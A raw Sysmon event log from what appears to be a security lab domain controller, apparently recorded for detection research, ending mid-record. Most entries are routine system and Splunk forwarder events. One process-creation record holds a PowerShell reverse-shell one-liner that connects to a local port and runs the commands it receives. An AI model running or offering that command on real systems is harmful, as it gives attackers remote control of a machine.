15:27:48.084{5ABCFE62-842F-603E-0C00-00000000AD01}8525360C:\Windows\system32\svchost.exe{5ABCFE62-AAF4-603F-2F28-00000000AD01}7056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765214Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.053{5ABCFE62-92CC-603F-4925-00000000AD01}67845620C:\Windows\system32\conhost.exe{5ABCFE62-AAF4-603F-2F28-00000000AD01}7056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765213Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.053{5ABCFE62-842F-603E-0C00-00000000AD01}8525360C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765212Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.053{5ABCFE62-842F-603E-0C00-00000000AD01}8525360C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765211Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.053{5ABCFE62-842F-603E-0C00-00000000AD01}8525360C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765210Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.053{5ABCFE62-842F-603E-0C00-00000000AD01}8525360C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001765209Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.053{5ABCFE62-99F1-603E-7907-00000000AD01}30803060C:\Windows\system32\csrss.exe{5ABCFE62-AAF4-603F-2F28-00000000AD01}7056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001765208Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.053{5ABCFE62-92CC-603F-4825-00000000AD01}57124016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-AAF4-603F-2F28-00000000AD01}7056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d89331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd341a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd33e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d7e54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5ccf4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd52edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd36540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd36540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd363d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd28356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd34889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd34425(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd341a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd33e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d7e54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd1acd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5cd1a2a7(wow64) 23542300x80000000000000001765207Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.053{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A3FAD2D4CC9004D65CBCA8A4BF4E7B8,SHA256=16F799E18770566E5D1D3AA3354F2085AC37D640DE1232C3A39A4D867F068E2F,IMPHASH=00000000000000000000000000000000falsetrue 154100x80000000000000001765206Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.056{5ABCFE62-AAF4-603F-2F28-00000000AD01}7056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c "=(New-Object Net.Sockets.TCPClient('localhost',55555)).GetStream();[byte[]]=0..65535|%%{0};while((=.Read(,0,.Length)) -ne 0){;=(New-Object Text.ASCIIEncoding).GetString(,0,);=([text.encoding]::ASCII).GetBytes((iex 2>&1));.Write(,0,.Length)}"C:\Users\Administrator\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5ABCFE62-92CC-603F-4825-00000000AD01}5712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000001765205Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:48.037{5ABCFE62-AAF3-603F-2E28-00000000AD01}5800ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765229Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:49.428{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BA798563CDECCDFECA1ED6CE69489FD,SHA256=A0305A816F6A8684513B747288089B44F5852F0B5806B80AB5FA2AB47297FF3B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001765228Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:45.319{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local52322-false10.0.1.12-8000- 23542300x80000000000000001765227Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:49.069{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4BFAB61CA57B9FDEBB391DDD6611FE71,SHA256=1977ADD83C2725576BA6006550D0EF66A5477A8E91B04869EEF8D67189240A93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765230Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:50.428{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6183B191D5679BA05630FEAF250BC36,SHA256=9E21FE893D8AA3F07B8FB98261947D95F847DC6B7089F6B836FC312AEC4FA688,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765231Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:51.444{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=063F6031546DDA611F460C310946477F,SHA256=0ECFAE0E317D28254DCF6E62231A6BDECD97A94350F98B43E7F32D1C7FF69DA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765232Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:52.459{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43CCA60BAC64970095C0ECB4A1224544,SHA256=30C95A2B630CA316CA5FF810BB57B5EDD419B8CC9F05B40637BCA64B8C135AE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765234Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:53.475{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3CDC05D6E59518915E42A6A92338E5E,SHA256=8C6B4112566FCC948608E843F6F5A3BEEF794DA4B3D304D63D4BF31825946767,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765233Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:53.178{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA4D743720A33A575E7EE4250A940D6A,SHA256=7060A0BCE3FC3FABB8EC35B97D85DE23F61BA132072BE12D4275AEB641A03622,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765236Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:54.491{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5191E4D17FCB14F26F7C801C70C06990,SHA256=BD803B7E912B44EB4A495ECB1F03D95AE0EC6FF197EF3115BE65EBE7AA236A0B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001765235Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:50.382{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local52323-false10.0.1.12-8000- 23542300x80000000000000001765237Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:55.506{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5424B1459433CAEEAF8EAD499D44E728,SHA256=E403EB72CBF7568E20408C62D0DE36B83E1F7043144B0EC996D4825D54F917D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765238Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:56.522{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B4EDFDC6F0AEE882A52BCD5591DD5F5,SHA256=5A1A12A592C206709C17AAFAA18448C4DC526A6E54D98C400E6DE4DF1C2D7409,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765239Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:57.537{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=804ED8B11D00952075A137D590C7A742,SHA256=103757B8CA30A7BB89CBF4C6F76F077D5BB9679623F03DF7CE64DC86AC8B4DF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765242Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:58.537{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11314DC4D2629D22BA90DBFEA0352A57,SHA256=D3C6D83EFF98422B0DADB8C83DEE36CD28A076EC30787F2C79E4E8DC807DC17C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765241Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:58.194{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2EAAAE3A80EC839E7F6B56EC855598C8,SHA256=87DDAA8F4EF773B25DBCC7E06B762F6016E197D820B2968DE519C86FE7803E3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765240Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:58.194{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=88C6D6E663E4C04B2B91EF8439A92C23,SHA256=15545E6556B9A0C432652C4AF0B80AB9605268A441A40628F420D4F5D3C90DFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765245Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:59.803{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2EAAAE3A80EC839E7F6B56EC855598C8,SHA256=87DDAA8F4EF773B25DBCC7E06B762F6016E197D820B2968DE519C86FE7803E3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765244Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:59.553{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B87F1FAA4DEF0AD8088CB0A930EEF4C,SHA256=AFC1CD59ECBCA5A572D7F7254028D92C3EB25E103D69712284F2CECD6CACDFC5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001765243Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:55.444{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local52324-false10.0.1.12-8000- 23542300x80000000000000001765246Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:00.569{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D54079CB15D6F0EE1B6C2CFF97372A6,SHA256=54CB9D9555B49935551B9E04B9E6ABC93E6E11AA977A86C879C4F7AFAA7AE1F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765247Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:01.569{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7AFD64B4AD781AEA4D4086820093B77,SHA256=863ACA43877287225D1865F4531C91132F874BEAB3D46ADEA86F64F58AF24FDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765248Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:02.569{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F111EF2DD67D7FCA12EC61E2D89EBCF,SHA256=FB6787D5B1D4563A909B4285FFDA3A1633DF7F0C844F04687245F8F6E579516C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765250Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:03.584{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E37A7D5DEAB3856AE739CE1CB6833E6A,SHA256=EAC4575678BB0648BC2E7B6F67537B52B2197F0DB6ED302D901018810C457671,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765249Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:03.241{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74012A1230CCB5F7838C8412DA0EDC2A,SHA256=16161E625DE960F2E829F590658CA5F31A998A1E839C5B80F5C884F55BBF8F6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765252Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:04.584{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=340B0545A24829FFDC9EBF8C378BE647,SHA256=7388C24AE142D13B7E72C25B4BCCE66919E972C1816BA6F17AD5AD007639C4B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001765251Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:00.460{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local52326-false10.0.1.12-8000- 23542300x80000000000000001765253Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:05.600{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=816625A883F18AE7F3A2F3C0C65A3E9F,SHA256=DA971B642366C653D6D645480878170538D7041FE7A7AD7A34CB37507F520D2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765254Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:06.616{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDE38F4864BFC5C06EE2987F598AD5A0,SHA256=2B559A9BB655484BB9C187485C9AB8F89E94F4B3C75D33B23272626F4E816A75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765255Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:28:07.617{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 